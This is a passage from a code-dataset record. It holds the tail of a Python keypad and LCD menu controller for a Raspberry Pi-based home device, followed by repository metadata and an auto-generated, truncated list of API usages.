timeout serves 2 purposes\n # first, if menu system (Keys) are not touched in some time,\n # it will take the menu back to home\n # second, if the status of device has changed (diag code updated in heartbeat)\n # this will refresh the home screen to show the new state (thumbs down/up).\n # challenge here is that if an error message is shown, this refresh should not overwrite it\n time.sleep(UNIT_TIMEOUT)\n if keypad.menu_index == 5:\n keypad.show_home_screen()\n else:\n # this allows showing LED error even with in different menu\n keypad.refresh_status(True)\n # print(\"menu_active_countdown: \" + str(keypad.menu_active_countdown) +\n # \" countdown_to_turnoff_screen: \" + str(keypad.countdown_to_turn_off_screen) +\n # \" screen is off? \" + str(keypad.screen_timed_out))\n keypad.menu_active_countdown -= 1\n if keypad.menu_active_countdown == 0:\n # this part ensures we read status and update screen info\n keypad.show_home_screen()\n keypad.menu_active_countdown = MENU_TIMEOUT\n if keypad.screen_timed_out is False:\n keypad.countdown_to_turn_off_screen -= 1\n if keypad.countdown_to_turn_off_screen == 0:\n keypad.screen_timed_out = True\n keypad.clear_screen()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n", "repo_name": "WE-PN/wepn-home", "sub_path": "usr/local/pproxy/system_services/keypad.py", "file_name": "keypad.py", "file_ext": "py", "file_size_in_byte": 32256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "logging.config.fileConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 33, "usage_type": "attribute"}, {"api_name": "self.configparser.config", "line_number": 52, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 52, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 52, "usage_type": "call"}, {"api_name": "self.configparser.config.read", "line_number": 53, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 53, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 53, "usage_type": "name"}, {"api_name": "self.configparser.status", "line_number": 54, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 54, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 54, "usage_type": "call"}, {"api_name": "self.configparser.status.read", "line_number": 55, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 55, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 55, "usage_type": "name"}, {"api_name": "self.configparser.logger", "line_number": 56, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 56, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 56, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 57, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 57, "usage_type": "name"}, {"api_name": "device.Device", "line_number": 57, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 57, "usage_type": "attribute"}, {"api_name": "self.configparser.display_active", "line_number": 58, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 58, "usage_type": "name"}, {"api_name": "self.configparser.window_stack", "line_number": 59, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 59, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 60, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 60, "usage_type": "name"}, {"api_name": "self.configparser.led_client", "line_number": 61, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 61, "usage_type": "name"}, {"api_name": "led_client.LEDClient", "line_number": 61, "usage_type": "call"}, {"api_name": "self.configparser.config.get", "line_number": 62, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 62, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 62, "usage_type": "name"}, {"api_name": "self.configparser.enabled", "line_number": 65, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 65, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 69, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 69, "usage_type": "name"}, {"api_name": "self.configparser.init_i2c", "line_number": 70, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 70, "usage_type": "name"}, {"api_name": "self.configparser.enabled", "line_number": 71, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 71, "usage_type": "name"}, {"api_name": "self.configparser.diag_shown", "line_number": 72, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 72, "usage_type": "name"}, {"api_name": "self.configparser.lcd", "line_number": 73, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 73, "usage_type": "name"}, {"api_name": "lcd.LCD", "line_number": 73, "usage_type": "call"}, {"api_name": "self.configparser.lcd.set_lcd_present", "line_number": 74, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 74, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 74, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 74, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 74, "usage_type": "attribute"}, {"api_name": "self.configparser.lcd.display", "line_number": 75, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 75, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 75, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 76, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 76, "usage_type": "name"}, {"api_name": "self.configparser.width", "line_number": 77, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 77, "usage_type": "name"}, {"api_name": "self.configparser.height", "line_number": 78, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 78, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 79, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 79, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_skip", "line_number": 80, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 80, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 81, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 81, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 82, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 82, "usage_type": "name"}, {"api_name": "self.configparser.led_setting_index", "line_number": 83, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 83, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 84, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 84, "usage_type": "name"}, {"api_name": "self.configparser.menu_active_countdown", "line_number": 85, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 85, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 86, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 86, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 87, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 87, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 88, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 88, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 89, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 89, "usage_type": "name"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 90, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 90, "usage_type": "name"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 91, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 91, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 92, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 92, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 93, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 93, "usage_type": "name"}, {"api_name": "RPi.GPIO.setmode", "line_number": 96, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 96, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 96, "usage_type": "attribute"}, {"api_name": "board.I2C", "line_number": 97, "usage_type": "call"}, {"api_name": "RPi.GPIO.setup", "line_number": 99, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 99, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 99, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PUD_UP", "line_number": 99, "usage_type": "attribute"}, {"api_name": "self.configparser.aw", "line_number": 101, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 101, "usage_type": "name"}, {"api_name": "adafruit_aw9523.AW9523", "line_number": 101, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device.I2CDevice", "line_number": 102, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device", "line_number": 102, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 105, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 105, "usage_type": "name"}, {"api_name": "adafruit_aw9523.AW9523", "line_number": 105, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device.I2CDevice", "line_number": 106, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device", "line_number": 106, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 108, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 108, "usage_type": "name"}, {"api_name": "adafruit_aw9523.AW9523", "line_number": 108, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device.I2CDevice", "line_number": 109, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device", "line_number": 109, "usage_type": "name"}, {"api_name": "self.configparser.aw.reset", "line_number": 110, "usage_type": "call"}, {"api_name": "self.configparser.aw", "line_number": 110, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 110, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 112, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 112, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 121, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 140, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 150, "usage_type": "call"}, {"api_name": "RPi.GPIO.add_event_detect", "line_number": 151, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 151, "usage_type": "name"}, {"api_name": "RPi.GPIO.FALLING", "line_number": 151, "usage_type": "attribute"}, {"api_name": "self.configparser.key_press_cb", "line_number": 151, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 151, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 154, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 154, "usage_type": "name"}, {"api_name": "math.log2", "line_number": 159, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 162, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 162, "usage_type": "name"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 163, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 163, "usage_type": "name"}, {"api_name": "self.configparser.menu_active_countdown", "line_number": 168, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 168, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 171, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 171, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 174, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 174, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 175, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 175, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 177, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 177, "usage_type": "name"}, {"api_name": "self.configparser.window_stack.pop", "line_number": 187, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 187, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 187, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 188, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 188, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 189, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 189, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 191, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 191, "usage_type": "name"}, {"api_name": "self.configparser.show_home_screen", "line_number": 193, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 193, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 195, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 195, "usage_type": "name"}, {"api_name": "self.configparser.window_stack", "line_number": 195, "usage_type": "attribute"}, {"api_name": "self.configparser.window_stack.append", "line_number": 196, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 196, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 196, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 196, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 197, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 197, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 197, "usage_type": "attribute"}, {"api_name": "self.configparser.diag_shown", "line_number": 199, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 199, "usage_type": "name"}, {"api_name": "self.configparser.diag_shown", "line_number": 200, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 200, "usage_type": "name"}, {"api_name": "self.configparser.window_stack.clear", "line_number": 203, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 203, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 203, "usage_type": "name"}, {"api_name": "self.configparser.show_home_screen", "line_number": 205, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 205, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 207, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 207, "usage_type": "name"}, {"api_name": "self.configparser.lcd.clear", "line_number": 210, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 210, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 210, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 213, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 213, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 214, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 214, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 217, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 217, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 221, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 221, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 222, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 222, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 229, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 229, "usage_type": "name"}, {"api_name": "self.configparser.round_corner", "line_number": 230, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 230, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 240, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 240, "usage_type": "name"}, {"api_name": "self.configparser.round_corner", "line_number": 241, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 241, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 250, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 250, "usage_type": "name"}, {"api_name": "self.configparser.width", "line_number": 250, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 250, "usage_type": "name"}, {"api_name": "self.configparser.height", "line_number": 250, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 251, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 251, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 253, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 253, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 254, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 254, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 255, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 255, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 257, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 257, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 257, "usage_type": "attribute"}, {"api_name": "self.configparser.titles", "line_number": 258, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 258, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 258, "usage_type": "attribute"}, {"api_name": "self.configparser.titles", "line_number": 259, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 259, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 259, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 268, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 268, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 268, "usage_type": "attribute"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 279, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 279, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_skip", "line_number": 279, "usage_type": "attribute"}, {"api_name": "self.configparser.half_round_rectangle", "line_number": 283, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 283, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 283, "usage_type": "attribute"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 292, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 292, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 293, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 293, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 295, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 295, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 296, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 296, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 299, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 299, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 300, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 300, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 315, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 315, "usage_type": "name"}, {"api_name": "PIL.Image.alpha_composite", "line_number": 317, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 317, "usage_type": "name"}, {"api_name": "self.configparser.lcd.show_image", "line_number": 320, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 320, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 320, "usage_type": "name"}, {"api_name": "self.configparser.config.read", "line_number": 323, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 323, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 323, "usage_type": "name"}, {"api_name": "self.configparser.status.read", "line_number": 324, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 324, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 324, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 325, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 325, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 325, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 326, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 326, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 326, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 329, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 329, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 329, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 334, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 334, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 334, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 335, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 335, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 335, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 338, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 338, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 338, "usage_type": "name"}, {"api_name": "self.configparser.lcd.set_logo_text", "line_number": 342, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 342, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 342, "usage_type": "name"}, {"api_name": "self.configparser.lcd.show_logo", "line_number": 343, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 343, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 343, "usage_type": "name"}, {"api_name": "self.configparser.device.reboot", "line_number": 344, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 344, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 344, "usage_type": "name"}, {"api_name": "self.configparser.lcd.set_logo_text", "line_number": 348, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 348, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 348, "usage_type": "name"}, {"api_name": "self.configparser.lcd.show_logo", "line_number": 349, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 349, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 349, "usage_type": "name"}, {"api_name": "self.configparser.device.turn_off", "line_number": 350, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 350, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 350, "usage_type": "name"}, {"api_name": "diag.WPDiag", "line_number": 354, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 354, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 354, "usage_type": "name"}, {"api_name": "self.configparser.lcd.long_text", "line_number": 356, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 356, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 356, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 357, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 357, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 357, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 358, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 358, "usage_type": "name"}, {"api_name": "diag.get_error_code", "line_number": 358, "usage_type": "call"}, {"api_name": "self.configparser.config.get", "line_number": 359, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 359, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 359, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 360, "usage_type": "call"}, {"api_name": "self.configparser.diag_code", "line_number": 361, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 361, "usage_type": "name"}, {"api_name": "self.configparser.device.get_local_ip", "line_number": 363, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 363, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 363, "usage_type": "name"}, {"api_name": "self.configparser.device.get_local_mac", "line_number": 364, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 364, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 364, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 365, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 365, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 365, "usage_type": "name"}, {"api_name": "self.configparser.logger.debug", "line_number": 366, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 366, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 366, "usage_type": "name"}, {"api_name": "self.configparser", "line_number": 370, "usage_type": "argument"}, {"api_name": "self.configparser.run_diagnostics", "line_number": 371, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 371, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 372, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 372, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 373, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 373, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 373, "usage_type": "name"}, {"api_name": "self.configparser.diag_shown", "line_number": 374, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 374, "usage_type": "name"}, {"api_name": "self.configparser.logger.debug", "line_number": 380, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 380, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 380, "usage_type": "name"}, {"api_name": "os.kill", "line_number": 383, "usage_type": "call"}, {"api_name": "signal.SIGUSR1", "line_number": 383, "usage_type": "attribute"}, {"api_name": "self.configparser.logger.error", "line_number": 385, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 385, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 385, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 389, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 389, "usage_type": "name"}, {"api_name": "self.configparser.titles.insert", "line_number": 390, "usage_type": "call"}, {"api_name": "self.configparser.titles", "line_number": 390, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 390, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 391, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 391, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 391, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 394, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 394, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 394, "usage_type": "attribute"}, {"api_name": "self.configparser.render", "line_number": 395, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 395, "usage_type": "name"}, {"api_name": "self.configparser.status.read", "line_number": 398, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 398, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 398, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 399, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 399, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 399, "usage_type": "name"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 401, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 401, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 401, "usage_type": "attribute"}, {"api_name": "self.configparser.diag_code", "line_number": 402, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 402, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 404, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 404, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 404, "usage_type": "attribute"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 405, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 405, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 405, "usage_type": "attribute"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 408, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 408, "usage_type": "name"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 409, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 409, "usage_type": "name"}, {"api_name": "self.configparser.led_client.pulse", "line_number": 411, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 411, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 411, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 412, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 412, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 414, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 414, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 419, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 419, "usage_type": "name"}, {"api_name": "self.configparser.led_client.blank", "line_number": 420, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 420, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 420, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 423, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 423, "usage_type": "name"}, {"api_name": "self.configparser.status", "line_number": 424, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 424, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 424, "usage_type": "call"}, {"api_name": "self.configparser.status.read", "line_number": 425, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 425, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 425, "usage_type": 